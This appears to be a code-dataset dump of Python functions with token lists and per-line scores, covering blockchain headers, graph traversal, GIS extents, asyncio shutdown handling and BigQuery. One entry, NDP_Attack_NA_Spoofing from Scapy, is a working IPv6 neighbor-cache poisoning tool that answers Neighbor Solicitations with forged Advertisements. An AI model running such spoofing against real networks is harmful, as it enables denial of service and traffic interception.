"sleep",
"(",
"0.01",
")",
"while",
"len",
"(",
"response",
")",
"<",
"len",
"(",
"data",
")",
":",
"response",
"+=",
"self",
".",
"sendCommand",
"(",
"commands",
".",
"SPITransferCommand",
"(",
"''",
")",
")",
".",
"data",
"return",
"''",
".",
"join",
"(",
"response",
")"
] | 29.272727 | [
0.04,
0.05714285714285714,
0,
0.1111111111111111,
0.05128205128205128,
0,
0.125,
0.041666666666666664,
0.18181818181818182,
0.04878048780487805,
0.05,
0.04878048780487805,
0,
0.09523809523809523,
0.04878048780487805,
0.03333333333333333,
0.07142857142857142,
0,
0.05,
0.02564102564102564,
0,
0.0625
] |
def _find_new_ancestors(cls, db: BaseDB, header: BlockHeader) -> Iterable[BlockHeader]:
    """
    Returns the chain leading up from the given header until (but not including)
    the first ancestor it has in common with our canonical chain.

    If D is the canonical head in the following chain, and F is the new header,
    then this function returns (F, E).

    A - B - C - D
             \
              E - F
    """
    h = header
    while True:
        try:
            orig = cls._get_canonical_block_header_by_number(db, h.block_number)
        except HeaderNotFound:
            # This just means the block is not on the canonical chain.
            pass
        else:
            if orig.hash == h.hash:
                # Found the common ancestor, stop.
                break

        # Found a new ancestor
        yield h

        if h.parent_hash == GENESIS_PARENT_HASH:
            break
        else:
            h = cls._get_block_header_by_hash(db, h.parent_hash)
"def",
"_find_new_ancestors",
"(",
"cls",
",",
"db",
":",
"BaseDB",
",",
"header",
":",
"BlockHeader",
")",
"->",
"Iterable",
"[",
"BlockHeader",
"]",
":",
"h",
"=",
"header",
"while",
"True",
":",
"try",
":",
"orig",
"=",
"cls",
".",
"_get_canonical_block_header_by_number",
"(",
"db",
",",
"h",
".",
"block_number",
")",
"except",
"HeaderNotFound",
":",
"# This just means the block is not on the canonical chain.",
"pass",
"else",
":",
"if",
"orig",
".",
"hash",
"==",
"h",
".",
"hash",
":",
"# Found the common ancestor, stop.",
"break",
"# Found a new ancestor",
"yield",
"h",
"if",
"h",
".",
"parent_hash",
"==",
"GENESIS_PARENT_HASH",
":",
"break",
"else",
":",
"h",
"=",
"cls",
".",
"_get_block_header_by_hash",
"(",
"db",
",",
"h",
".",
"parent_hash",
")"
] | 34.064516 | [
0.022988505747126436,
0.18181818181818182,
0.047619047619047616,
0.028985507246376812,
0,
0.03614457831325301,
0.07142857142857142,
0,
0.09523809523809523,
0.1875,
0.09523809523809523,
0.18181818181818182,
0.1111111111111111,
0.10526315789473684,
0.125,
0.03571428571428571,
0.058823529411764705,
0.02702702702702703,
0.1,
0.11764705882352941,
0.05128205128205128,
0.037037037037037035,
0.08,
0,
0.058823529411764705,
0.10526315789473684,
0,
0.038461538461538464,
0.09523809523809523,
0.11764705882352941,
0.029411764705882353
] |
def step(g, n1, n2, inbound=False, backward=False, continue_fn=None):
"""
Step along a path through a directed graph unless there is an intersection
Example graph:
Note that edges (1, 2) and (2, 3) are bidirectional, i.e., (2, 1) and
(3, 2) are also edges
1 -- 2 -- 3 -->-- 5 -->-- 7
     |            |
     ^            v
     |            |
     4            6
>>> step(g, 1, 2)
3
>>> step(g, 3, 5)
None
>>> step(g, 2, 3)
5
>>> step(g, 2, 3, inbound=True)
None
>>> step(g, 7, 5, backward=True)
3
>>> def f(g, n1, n2, backward):
if n2 == 5:
return 7
return None
>>> step(g, 3, 5, continue_fn=f)
7
Parameters
----------
g : networkx DiGraph
n1 : node id in g
n2 : node id in g
(n1, n2) must be an edge in g
inbound : bool (default False)
whether incoming edges should be considered
backward : bool (default False)
whether edges are in reverse order (i.e., point from n2 to n1)
continue_fn : callable (optional)
if at an intersection, continue_fn is called to indicate how to
proceed
continue_fn takes the form:
f(g, n1, n2, backward) where all arguments are as passed into step.
f should return a node id such that f(g, n1, n2, backward) is a
successors of n2. f should return None if no way forward.
Returns
-------
The next node in the path from n1 to n2. Returns None if there
are no edges from n2 or multiple edges from n2
"""
forw = g.successors
back = g.predecessors
if backward:
back, forw = forw, back
nodes = forw(n2)
if inbound:
nodes = set(nodes + back(n2))
candidates = [n for n in nodes if n != n1]
if len(candidates) == 1:
result = candidates[0]
elif continue_fn:
result = continue_fn(g, n1, n2, backward)
else:
result = None
return result | [
"def",
"step",
"(",
"g",
",",
"n1",
",",
"n2",
",",
"inbound",
"=",
"False",
",",
"backward",
"=",
"False",
",",
"continue_fn",
"=",
"None",
")",
":",
"forw",
"=",
"g",
".",
"successors",
"back",
"=",
"g",
".",
"predecessors",
"if",
"backward",
":",
"back",
",",
"forw",
"=",
"forw",
",",
"back",
"nodes",
"=",
"forw",
"(",
"n2",
")",
"if",
"inbound",
":",
"nodes",
"=",
"set",
"(",
"nodes",
"+",
"back",
"(",
"n2",
")",
")",
"candidates",
"=",
"[",
"n",
"for",
"n",
"in",
"nodes",
"if",
"n",
"!=",
"n1",
"]",
"if",
"len",
"(",
"candidates",
")",
"==",
"1",
":",
"result",
"=",
"candidates",
"[",
"0",
"]",
"elif",
"continue_fn",
":",
"result",
"=",
"continue_fn",
"(",
"g",
",",
"n1",
",",
"n2",
",",
"backward",
")",
"else",
":",
"result",
"=",
"None",
"return",
"result"
] | 25.051948 | [
0.014492753623188406,
0.2857142857142857,
0.02564102564102564,
0,
0.1111111111111111,
0.041666666666666664,
0.08,
0,
0.1935483870967742,
0.17391304347826086,
0.13043478260869565,
0.17391304347826086,
0.13043478260869565,
0,
0.14285714285714285,
0.4,
0.14285714285714285,
0.25,
0,
0.14285714285714285,
0.4,
0.08571428571428572,
0.25,
0,
0.07692307692307693,
0.4,
0,
0.08571428571428572,
0.08695652173913043,
0.08333333333333333,
0.08695652173913043,
0.08333333333333333,
0.4,
0,
0,
0.14285714285714285,
0.14285714285714285,
0.125,
0.14285714285714285,
0.14285714285714285,
0.05405405405405406,
0.11764705882352941,
0.0392156862745098,
0.11428571428571428,
0.04285714285714286,
0.10810810810810811,
0.028169014084507043,
0.13333333333333333,
0,
0.05714285714285714,
0.02666666666666667,
0.028169014084507043,
0.03076923076923077,
0,
0.18181818181818182,
0.18181818181818182,
0.030303030303030304,
0.04,
0,
0.2857142857142857,
0.08695652173913043,
0.08,
0.125,
0.06451612903225806,
0,
0.1,
0.13333333333333333,
0.05405405405405406,
0.043478260869565216,
0,
0.07142857142857142,
0.06666666666666667,
0.09523809523809523,
0.04081632653061224,
0.2222222222222222,
0.09523809523809523,
0.11764705882352941
] |
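The doctests above assume a pre-built graph g; a runnable reconstruction with networkx (the edge set is my reading of the ASCII sketch) could look like:

import networkx as nx

# Edges (1, 2) and (2, 3) are bidirectional; 3 -> 5 -> 7 are one-way,
# 4 feeds up into 2, and 5 branches down to 6, as drawn above.
g = nx.DiGraph()
g.add_edges_from([(1, 2), (2, 1), (2, 3), (3, 2),
                  (3, 5), (5, 7), (4, 2), (5, 6)])

print(step(g, 1, 2))  # 3    -- exactly one way onward from 2 besides node 1
print(step(g, 3, 5))  # None -- 5 is an intersection (successors 6 and 7)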
def rectangle_geo_array(rectangle, map_canvas):
"""Obtain the rectangle in EPSG:4326.
:param rectangle: A rectangle instance.
:type rectangle: QgsRectangle
:param map_canvas: A map canvas instance.
:type map_canvas: QgsMapCanvas
:returns: A list in the form [xmin, ymin, xmax, ymax] where all
coordinates provided are in Geographic / EPSG:4326.
:rtype: list
.. note:: Delegates to extent_to_array()
"""
destination_crs = QgsCoordinateReferenceSystem()
destination_crs.createFromSrid(4326)
source_crs = map_canvas.mapSettings().destinationCrs()
return extent_to_array(rectangle, source_crs, destination_crs) | [
"def",
"rectangle_geo_array",
"(",
"rectangle",
",",
"map_canvas",
")",
":",
"destination_crs",
"=",
"QgsCoordinateReferenceSystem",
"(",
")",
"destination_crs",
".",
"createFromSrid",
"(",
"4326",
")",
"source_crs",
"=",
"map_canvas",
".",
"mapSettings",
"(",
")",
".",
"destinationCrs",
"(",
")",
"return",
"extent_to_array",
"(",
"rectangle",
",",
"source_crs",
",",
"destination_crs",
")"
] | 29.636364 | [
0.02127659574468085,
0.04878048780487805,
0,
0.06976744186046512,
0.09090909090909091,
0,
0.06666666666666667,
0.08823529411764706,
0,
0.05970149253731343,
0.05084745762711865,
0.1875,
0,
0.06818181818181818,
0.2857142857142857,
0,
0.038461538461538464,
0.05,
0,
0.034482758620689655,
0,
0.030303030303030304
] |
def shutdown_waits_for(coro, loop=None):
"""Prevent coro from being cancelled during the shutdown sequence.
The trick here is that we add this coro to the global
"DO_NOT_CANCEL" collection, and then later during the shutdown
sequence we make sure that the task that wraps this coro will NOT
be cancelled.
To make this work, we have to create a super-secret task, below, that
communicates with the caller (which "awaits" us) via a Future. Using
a Future in this way allows us to avoid awaiting the Task, which
decouples the Task from the normal exception propagation which would
normally happen when the outer Task gets cancelled. We get the
result of coro back to the caller via Future.set_result.
NOTE that during the shutdown sequence, the caller WILL NOT be able
to receive a result, since the caller will likely have been
cancelled. So you should probably not rely on capturing results
via this function.
"""
loop = loop or get_event_loop()
fut = loop.create_future() # This future will connect coro and the caller.
async def coro_proxy():
"""This function will await coro, but it will also send the result
over to the future. Remember: the outside caller (of
shutdown_waits_for) will be awaiting fut, NOT coro(), due to
the decoupling. However, when coro completes, we need to send its
result over to the fut to make it look *as if* it was just coro
running the whole time. This whole thing is a teeny magic trick.
"""
try:
result = await coro
except (CancelledError, Exception) as e:
set_fut_done = partial(fut.set_exception, e)
else:
set_fut_done = partial(fut.set_result, result)
if not fut.cancelled():
set_fut_done()
new_coro = coro_proxy() # We'll taskify this one instead of coro.
_DO_NOT_CANCEL_COROS.add(new_coro) # The new task must not be cancelled.
loop.create_task(new_coro) # Make the task
# Ok, so we *could* simply return fut. Callers can await it as normal,
# e.g.
#
# async def blah():
# x = await shutdown_waits_for(bleh())
#
# That will work fine. However, callers may *also* want to detach the
# call from the current execution context, e.g.
#
# async def blah():
# loop.create_task(shutdown_waits_for(bleh()))
#
# This will only work if shutdown_waits_for() returns a coroutine.
# Therefore, we just make a new coroutine to wrap the `await fut` and
# return that. Then both things will work.
#
# (Side note: instead of callers using create_tasks, it would also work
# if they used `asyncio.ensure_future()` instead, since that can work
# with futures. But I don't like ensure_future.)
#
# (Another side note: You don't even need `create_task()` or
# `ensure_future()`...If you don't want a result, you can just call
# `shutdown_waits_for()` as a flat function call, no await or anything,
# and it should still work; unfortunately it causes a RuntimeWarning to
# tell you that ``inner()`` was never awaited :/
async def inner():
return await fut
return inner() | [
"def",
"shutdown_waits_for",
"(",
"coro",
",",
"loop",
"=",
"None",
")",
":",
"loop",
"=",
"loop",
"or",
"get_event_loop",
"(",
")",
"fut",
"=",
"loop",
".",
"create_future",
"(",
")",
"# This future will connect coro and the caller.",
"async",
"def",
"coro_proxy",
"(",
")",
":",
"\"\"\"This function will await coro, but it will also send the result\n over the the future. Remember: the outside caller (of\n shutdown_waits_for) will be awaiting fut, NOT coro(), due to\n the decoupling. However, when coro completes, we need to send its\n result over to the fut to make it look *as if* it was just coro\n running the whole time. This whole thing is a teeny magic trick.\n \"\"\"",
"try",
":",
"result",
"=",
"await",
"coro",
"except",
"(",
"CancelledError",
",",
"Exception",
")",
"as",
"e",
":",
"set_fut_done",
"=",
"partial",
"(",
"fut",
".",
"set_exception",
",",
"e",
")",
"else",
":",
"set_fut_done",
"=",
"partial",
"(",
"fut",
".",
"set_result",
",",
"result",
")",
"if",
"not",
"fut",
".",
"cancelled",
"(",
")",
":",
"set_fut_done",
"(",
")",
"new_coro",
"=",
"coro_proxy",
"(",
")",
"# We'll taskify this one instead of coro.",
"_DO_NOT_CANCEL_COROS",
".",
"add",
"(",
"new_coro",
")",
"# The new task must not be cancelled.",
"loop",
".",
"create_task",
"(",
"new_coro",
")",
"# Make the task",
"# Ok, so we *could* simply return fut. Callers can await it as normal,",
"# e.g.",
"#",
"# async def blah():",
"# x = await shutdown_waits_for(bleh())",
"#",
"# That will work fine. However, callers may *also* want to detach the",
"# call from the current execution context, e.g.",
"#",
"# async def blah():",
"# loop.create_task(shutdown_waits_for(bleh()))",
"#",
"# This will only work if shutdown_waits_for() returns a coroutine.",
"# Therefore, we just make a new coroutine to wrap the `await fut` and",
"# return that. Then both things will work.",
"#",
"# (Side note: instead of callers using create_tasks, it would also work",
"# if they used `asyncio.ensure_future()` instead, since that can work",
"# with futures. But I don't like ensure_future.)",
"#",
"# (Another side note: You don't even need `create_task()` or",
"# `ensure_future()`...If you don't want a result, you can just call",
"# `shutdown_waits_for()` as a flat function call, no await or anything,",
"# and it should still work; unfortunately it causes a RuntimeWarning to",
"# tell you that ``inner()`` was never awaited :/",
"async",
"def",
"inner",
"(",
")",
":",
"return",
"await",
"fut",
"return",
"inner",
"(",
")"
] | 42.333333 | [
0.025,
0.02857142857142857,
0,
0.03508771929824561,
0.030303030303030304,
0.028985507246376812,
0.11764705882352941,
0,
0.0273972602739726,
0.041666666666666664,
0.029411764705882353,
0.027777777777777776,
0.029850746268656716,
0.03333333333333333,
0,
0.028169014084507043,
0.031746031746031744,
0.029411764705882353,
0.09090909090909091,
0.2857142857142857,
0.05714285714285714,
0.02531645569620253,
0,
0.07407407407407407,
0.02702702702702703,
0.06557377049180328,
0.04411764705882353,
0.0273972602739726,
0.04225352112676056,
0.027777777777777776,
0.18181818181818182,
0.16666666666666666,
0.06451612903225806,
0.041666666666666664,
0.03571428571428571,
0.15384615384615385,
0.034482758620689655,
0,
0.06451612903225806,
0.07692307692307693,
0,
0.02857142857142857,
0.025974025974025976,
0.0425531914893617,
0,
0.02666666666666667,
0.2,
0.4,
0.08695652173913043,
0.045454545454545456,
0.4,
0.02702702702702703,
0.0392156862745098,
0.4,
0.08695652173913043,
0.038461538461538464,
0.4,
0.02857142857142857,
0.0273972602739726,
0.0425531914893617,
0.4,
0.02666666666666667,
0.0273972602739726,
0.038461538461538464,
0.4,
0.03125,
0.028169014084507043,
0.02666666666666667,
0.02666666666666667,
0.038461538461538464,
0,
0.09090909090909091,
0.08333333333333333,
0,
0.1111111111111111
] |
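A compact sketch of the two calling patterns discussed in the comments above (bleh and blah are the hypothetical coroutines from those comments):

import asyncio

async def bleh():
    await asyncio.sleep(1)
    return 42

async def blah():
    # Pattern 1: await the wrapper; the result arrives via the hidden future.
    x = await shutdown_waits_for(bleh())
    # Pattern 2: detach entirely from the current execution context.
    asyncio.get_event_loop().create_task(shutdown_waits_for(bleh()))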
def zones(self):
"""
:class:`list` of :class:`stravalib.model.ActivityZone` objects for this activity.
"""
if self._zones is None:
self.assert_bind_client()
self._zones = self.bind_client.get_activity_zones(self.id)
return self._zones | [
"def",
"zones",
"(",
"self",
")",
":",
"if",
"self",
".",
"_zones",
"is",
"None",
":",
"self",
".",
"assert_bind_client",
"(",
")",
"self",
".",
"_zones",
"=",
"self",
".",
"bind_client",
".",
"get_activity_zones",
"(",
"self",
".",
"id",
")",
"return",
"self",
".",
"_zones"
] | 36.375 | [
0.0625,
0.18181818181818182,
0.10112359550561797,
0.18181818181818182,
0.06451612903225806,
0.05405405405405406,
0.02857142857142857,
0.07692307692307693
] |
async def tuple(self, elem=None, elem_type=None, params=None):
"""
Loads/dumps tuple
:return:
"""
version = await self.version(elem_type, params, elem=elem)
if self.is_tracked():
return self.get_tracked()
if hasattr(elem_type, 'boost_serialize'):
container = elem_type() if elem is None else elem
self.pop_track()
return await container.boost_serialize(self, elem=elem, elem_type=elem_type, params=params, version=version)
if self.writing:
self.pop_track()
return await self.dump_tuple(elem, elem_type, params)
else:
obj = await self.load_tuple(elem_type, params=params, elem=elem)
return self.track_obj(obj) | [
"async",
"def",
"tuple",
"(",
"self",
",",
"elem",
"=",
"None",
",",
"elem_type",
"=",
"None",
",",
"params",
"=",
"None",
")",
":",
"version",
"=",
"await",
"self",
".",
"version",
"(",
"elem_type",
",",
"params",
",",
"elem",
"=",
"elem",
")",
"if",
"self",
".",
"is_tracked",
"(",
")",
":",
"return",
"self",
".",
"get_tracked",
"(",
")",
"if",
"hasattr",
"(",
"elem_type",
",",
"'boost_serialize'",
")",
":",
"container",
"=",
"elem_type",
"(",
")",
"if",
"elem",
"is",
"None",
"else",
"elem",
"self",
".",
"pop_track",
"(",
")",
"return",
"await",
"container",
".",
"boost_serialize",
"(",
"self",
",",
"elem",
"=",
"elem",
",",
"elem_type",
"=",
"elem_type",
",",
"params",
"=",
"params",
",",
"version",
"=",
"version",
")",
"if",
"self",
".",
"writing",
":",
"self",
".",
"pop_track",
"(",
")",
"return",
"await",
"self",
".",
"dump_tuple",
"(",
"elem",
",",
"elem_type",
",",
"params",
")",
"else",
":",
"obj",
"=",
"await",
"self",
".",
"load_tuple",
"(",
"elem_type",
",",
"params",
"=",
"params",
",",
"elem",
"=",
"elem",
")",
"return",
"self",
".",
"track_obj",
"(",
"obj",
")"
] | 37.95 | [
0.016129032258064516,
0.18181818181818182,
0.08,
0.1875,
0.18181818181818182,
0.030303030303030304,
0.06896551724137931,
0.05405405405405406,
0,
0.04081632653061224,
0.03278688524590164,
0.07142857142857142,
0.025,
0,
0.08333333333333333,
0.07142857142857142,
0.03076923076923077,
0.15384615384615385,
0.02631578947368421,
0.05263157894736842
] |
def qasm(self, prec=15):
"""Return the corresponding OPENQASM string."""
if self.value == pi:
return "pi"
return ccode(self.value, precision=prec) | [
"def",
"qasm",
"(",
"self",
",",
"prec",
"=",
"15",
")",
":",
"if",
"self",
".",
"value",
"==",
"pi",
":",
"return",
"\"pi\"",
"return",
"ccode",
"(",
"self",
".",
"value",
",",
"precision",
"=",
"prec",
")"
] | 29.666667 | [
0.041666666666666664,
0.03636363636363636,
0.07142857142857142,
0.08695652173913043,
0,
0.041666666666666664
] |
def aligned_covariance(fit, type='noise'):
"""
Covariance rescaled so that eigenvectors sum to 1
and rotated into data coordinates from PCA space
"""
cov = fit._covariance_matrix(type)
# Rescale eigenvectors to sum to 1
cov /= N.linalg.norm(cov)
return dot(fit.axes,cov) | [
"def",
"aligned_covariance",
"(",
"fit",
",",
"type",
"=",
"'noise'",
")",
":",
"cov",
"=",
"fit",
".",
"_covariance_matrix",
"(",
"type",
")",
"# Rescale eigenvectors to sum to 1",
"cov",
"/=",
"N",
".",
"linalg",
".",
"norm",
"(",
"cov",
")",
"return",
"dot",
"(",
"fit",
".",
"axes",
",",
"cov",
")"
] | 32.666667 | [
0.023809523809523808,
0.2857142857142857,
0.03773584905660377,
0.038461538461538464,
0.2857142857142857,
0.05263157894736842,
0.05263157894736842,
0.06896551724137931,
0.10714285714285714
] |
def delete_dataset(self, dataset, delete_nonempty=True):
"""Deletes a dataset (and optionally any tables in it), if it exists.
:param dataset:
:type dataset: BQDataset
:param delete_nonempty: if true, will delete any tables before deleting the dataset
"""
if not self.dataset_exists(dataset):
return
self.client.datasets().delete(projectId=dataset.project_id,
datasetId=dataset.dataset_id,
deleteContents=delete_nonempty).execute() | [
"def",
"delete_dataset",
"(",
"self",
",",
"dataset",
",",
"delete_nonempty",
"=",
"True",
")",
":",
"if",
"not",
"self",
".",
"dataset_exists",
"(",
"dataset",
")",
":",
"return",
"self",
".",
"client",
".",
"datasets",
"(",
")",
".",
"delete",
"(",
"projectId",
"=",
"dataset",
".",
"project_id",
",",
"datasetId",
"=",
"dataset",
".",
"dataset_id",
",",
"deleteContents",
"=",
"delete_nonempty",
")",
".",
"execute",
"(",
")"
] | 41 | [
0.017857142857142856,
0.025974025974025976,
0,
0.15384615384615385,
0.11428571428571428,
0.05319148936170213,
0.18181818181818182,
0,
0.045454545454545456,
0.1111111111111111,
0,
0.04477611940298507,
0.05970149253731343,
0.06329113924050633
] |
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function sends
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination mac address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allows specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by default (False), the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
some 20+ ms. On a usual testbed, for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print("solicited node multicast @ does not match target @!")
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that replies to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
# Use the target field from the NS
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface) | [
"def",
"NDP_Attack_NA_Spoofing",
"(",
"iface",
"=",
"None",
",",
"mac_src_filter",
"=",
"None",
",",
"tgt_filter",
"=",
"None",
",",
"reply_mac",
"=",
"None",
",",
"router",
"=",
"False",
")",
":",
"def",
"is_request",
"(",
"req",
",",
"mac_src_filter",
",",
"tgt_filter",
")",
":",
"\"\"\"\n Check if packet req is a request\n \"\"\"",
"# Those simple checks are based on Section 5.4.2 of RFC 4862",
"if",
"not",
"(",
"Ether",
"in",
"req",
"and",
"IPv6",
"in",
"req",
"and",
"ICMPv6ND_NS",
"in",
"req",
")",
":",
"return",
"0",
"mac_src",
"=",
"req",
"[",
"Ether",
"]",
".",
"src",
"if",
"mac_src_filter",
"and",
"mac_src",
"!=",
"mac_src_filter",
":",
"return",
"0",
"# Source must NOT be the unspecified address",
"if",
"req",
"[",
"IPv6",
"]",
".",
"src",
"==",
"\"::\"",
":",
"return",
"0",
"tgt",
"=",
"inet_pton",
"(",
"socket",
".",
"AF_INET6",
",",
"req",
"[",
"ICMPv6ND_NS",
"]",
".",
"tgt",
")",
"if",
"tgt_filter",
"and",
"tgt",
"!=",
"tgt_filter",
":",
"return",
"0",
"dst",
"=",
"req",
"[",
"IPv6",
"]",
".",
"dst",
"if",
"in6_isllsnmaddr",
"(",
"dst",
")",
":",
"# Address is Link Layer Solicited Node mcast.",
"# If this is a real address resolution NS, then the destination",
"# address of the packet is the link-local solicited node multicast",
"# address associated with the target of the NS.",
"# Otherwise, the NS is a NUD related one, i.e. the peer is",
"# unicasting the NS to check the target is still alive (L2",
"# information is still in its cache and it is verified)",
"received_snma",
"=",
"inet_pton",
"(",
"socket",
".",
"AF_INET6",
",",
"dst",
")",
"expected_snma",
"=",
"in6_getnsma",
"(",
"tgt",
")",
"if",
"received_snma",
"!=",
"expected_snma",
":",
"print",
"(",
"\"solicited node multicast @ does not match target @!\"",
")",
"return",
"0",
"return",
"1",
"def",
"reply_callback",
"(",
"req",
",",
"reply_mac",
",",
"router",
",",
"iface",
")",
":",
"\"\"\"\n Callback that reply to a NS with a spoofed NA\n \"\"\"",
"# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and",
"# send it back.",
"mac",
"=",
"req",
"[",
"Ether",
"]",
".",
"src",
"pkt",
"=",
"req",
"[",
"IPv6",
"]",
"src",
"=",
"pkt",
".",
"src",
"tgt",
"=",
"req",
"[",
"ICMPv6ND_NS",
"]",
".",
"tgt",
"rep",
"=",
"Ether",
"(",
"src",
"=",
"reply_mac",
",",
"dst",
"=",
"mac",
")",
"/",
"IPv6",
"(",
"src",
"=",
"tgt",
",",
"dst",
"=",
"src",
")",
"# Use the target field from the NS",
"rep",
"/=",
"ICMPv6ND_NA",
"(",
"tgt",
"=",
"tgt",
",",
"S",
"=",
"1",
",",
"R",
"=",
"router",
",",
"O",
"=",
"1",
")",
"# noqa: E741",
"# \"If the solicitation IP Destination Address is not a multicast",
"# address, the Target Link-Layer Address option MAY be omitted\"",
"# Given our purpose, we always include it.",
"rep",
"/=",
"ICMPv6NDOptDstLLAddr",
"(",
"lladdr",
"=",
"reply_mac",
")",
"sendp",
"(",
"rep",
",",
"iface",
"=",
"iface",
",",
"verbose",
"=",
"0",
")",
"print",
"(",
"\"Reply NA for target address %s (received from %s)\"",
"%",
"(",
"tgt",
",",
"mac",
")",
")",
"if",
"not",
"iface",
":",
"iface",
"=",
"conf",
".",
"iface",
"# To prevent sniffing our own traffic",
"if",
"not",
"reply_mac",
":",
"reply_mac",
"=",
"get_if_hwaddr",
"(",
"iface",
")",
"sniff_filter",
"=",
"\"icmp6 and not ether src %s\"",
"%",
"reply_mac",
"router",
"=",
"(",
"router",
"and",
"1",
")",
"or",
"0",
"# Value of the R flags in NA",
"sniff",
"(",
"store",
"=",
"0",
",",
"filter",
"=",
"sniff_filter",
",",
"lfilter",
"=",
"lambda",
"x",
":",
"is_request",
"(",
"x",
",",
"mac_src_filter",
",",
"tgt_filter",
")",
",",
"prn",
"=",
"lambda",
"x",
":",
"reply_callback",
"(",
"x",
",",
"reply_mac",
",",
"router",
",",
"iface",
")",
",",
"iface",
"=",
"iface",
")"
] | 43.955882 | [
0.02631578947368421,
0.10526315789473684,
0.2857142857142857,
0.02631578947368421,
0.02531645569620253,
0.0410958904109589,
0.02702702702702703,
0.05405405405405406,
0.04411764705882353,
0,
0.03571428571428571,
0.046153846153846156,
0.061224489795918366,
0.04054054054054054,
0.2,
0.06578947368421052,
0.039473684210526314,
0.12,
0.0625,
0.05,
0,
0.03389830508474576,
0,
0.041666666666666664,
0.0410958904109589,
0,
0.0410958904109589,
0.0410958904109589,
0.04054054054054054,
0.0410958904109589,
0.06,
0,
0.02666666666666667,
0.06666666666666667,
0.05405405405405406,
0.047619047619047616,
0,
0.02631578947368421,
0.04054054054054054,
0.04,
0,
0.039473684210526314,
0.0410958904109589,
0.06382978723404255,
0,
0.02666666666666667,
0.04,
0.02702702702702703,
0.02666666666666667,
0.02702702702702703,
0.09523809523809523,
0,
0.02666666666666667,
0.04,
0.025974025974025976,
0.0410958904109589,
0.027777777777777776,
0.038461538461538464,
0.2857142857142857,
0,
0.038461538461538464,
0.18181818181818182,
0.05,
0.18181818181818182,
0,
0.029411764705882353,
0.028985507246376812,
0.1,
0,
0.0625,
0.03571428571428571,
0.1,
0,
0.038461538461538464,
0.06060606060606061,
0.1,
0,
0.03225806451612903,
0.045454545454545456,
0.1,
0,
0.07407407407407407,
0.02531645569620253,
0,
0.02666666666666667,
0.02564102564102564,
0.03389830508474576,
0.02857142857142857,
0.02857142857142857,
0.029850746268656716,
0.03389830508474576,
0.045454545454545456,
0.043478260869565216,
0.02631578947368421,
0.08333333333333333,
0,
0.125,
0,
0.037037037037037035,
0.18181818181818182,
0.03773584905660377,
0.18181818181818182,
0,
0.02631578947368421,
0.08695652173913043,
0.07142857142857142,
0.08695652173913043,
0.09523809523809523,
0.058823529411764705,
0.029411764705882353,
0.047619047619047616,
0.028985507246376812,
0,
0.027777777777777776,
0.028169014084507043,
0.04,
0.03773584905660377,
0,
0.047619047619047616,
0,
0.02531645569620253,
0,
0.11764705882352941,
0.07692307692307693,
0.04878048780487805,
0.09523809523809523,
0.05,
